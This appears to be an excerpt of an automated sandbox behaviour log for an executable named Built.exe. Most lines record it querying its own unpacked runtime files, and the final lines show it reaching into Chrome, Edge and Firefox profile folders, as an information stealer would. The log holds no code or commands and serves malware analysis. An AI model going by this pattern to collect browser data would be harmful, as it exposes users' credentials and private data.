Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
